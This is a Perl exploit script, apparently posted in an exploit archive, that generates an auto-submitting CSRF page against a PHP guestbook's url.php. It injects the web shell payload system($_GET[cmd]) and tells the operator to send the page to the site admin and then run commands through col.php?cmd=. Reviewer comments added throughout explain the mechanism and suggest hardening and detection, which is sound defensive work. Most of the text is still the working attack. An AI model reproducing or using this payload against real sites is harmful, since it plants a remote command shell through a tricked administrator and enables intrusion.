
DB Based GuestBook script V1.0 - Csrf inject php code (Perl)

Author: AtT4CKxT3rR0r1ST , Published: 21-01-2014
#!/usr/bin/perl
########################################################################
# Title : DB Based GuestBook script V1.0 - Csrf inject php code
# Author : AtT4CKxT3rR0r1ST
# Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
# Home : http://www.iphobos.com/blog/
# Script : www.hscripts.com/scripts/php/downloads/HGB.zip
# Version : 1.0
# Vulnerable file : url.php
use LWP::UserAgent;
use LWP::Simple;
# Reviewer annotation (defensive reading).
# This script is an offline generator: it prompts for a base URL, builds a
# self-submitting HTML form aimed at <base>/url.php, and appends that page to
# csrf.html in the current directory. No statement below calls the LWP
# modules loaded above, so the script itself sends no HTTP request; any POST
# would come from the browser of whoever opens csrf.html.
# There is no `use strict` / `use warnings`, so $h and $html are package
# globals.

# Clears the console through the shell ("cls" is the Windows command), then
# prints the author's banner.
system("cls");
print "|----------------------------------------------------|\n";
print "|DB Based GuestBook script v1.0- Csrf inject php code|\n";
print "| Coded by : AtT4CKxT3rR0r1ST |\n";
print "| GREATS TO MY LOVE |\n";
print "|----------------------------------------------------|\n";
sleep(2);
print "\nInsert Target:";
# The line read here is concatenated, unescaped and unvalidated, into the
# form's action attribute below.
$h = <STDIN>;
chomp $h;
# Generated page: the <body onload> handler submits form0 as soon as the page
# loads, so no click is required. The form POSTs what=write together with the
# fields Box, Body, Font, Odd, Even and var to url.php. The text placed in
# the Box input's value attribute is a quote-and-semicolon sequence followed
# by PHP statements; the page title describes this as PHP code injection.
# NOTE(review): url.php is not shown here. The request shape implies that it
# (a) accepts a state-changing POST without a per-session anti-CSRF token and
# (b) writes the submitted fields unescaped into a PHP file that is executed
# later, presumably col.php going by the final message. Confirm both against
# the application source.
# Hardening: require a CSRF token on url.php (SameSite session cookies as a
# second layer), keep these settings as data rather than generated PHP, and
# validate each field against an allow-list before storing it.
# Detection: POSTs to url.php with what=write whose Origin/Referer is foreign
# or whose fields contain quotes, semicolons or PHP function names;
# unexpected modification of the generated PHP file.
$html = '<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="'.$h.'/url.php">
<input type="hidden" name="Box" value=" ";system($_GET[cmd]);echo"cmd"/>
<input type="hidden" name="Body" value=""/>
<input type="hidden" name="Font" value=""/>
<input type="hidden" name="Odd" value=""/>
<input type="hidden" name="Even" value=""/>
<input type="hidden" name="var" value=""/>
<input type="hidden" name="what" value="write"/>
<input type="submit" value="Submit form"/>
</form>
</body>
</html>';
sleep(1);
print "Createing Done ...\n";
# Bareword filehandle, mode embedded in the filename string, and no check of
# open/print/close results. '>>' appends, so csrf.html grows on every run;
# that file is the only artefact this script leaves on disk.
open(XSS , '>>csrf.html');
print XSS $html;
close(XSS);
# Operator messages only; nothing is sent from here. They name the guestbook
# admin as the person who must open the page and col.php with a cmd query
# parameter as the follow-up request, which is the URL pattern to search for
# in web-server logs.
print "Now Send csrf.html To Admin \n";
sleep(1);
print "To Exploit [http://site/col.php?cmd= COMMAND] \n";
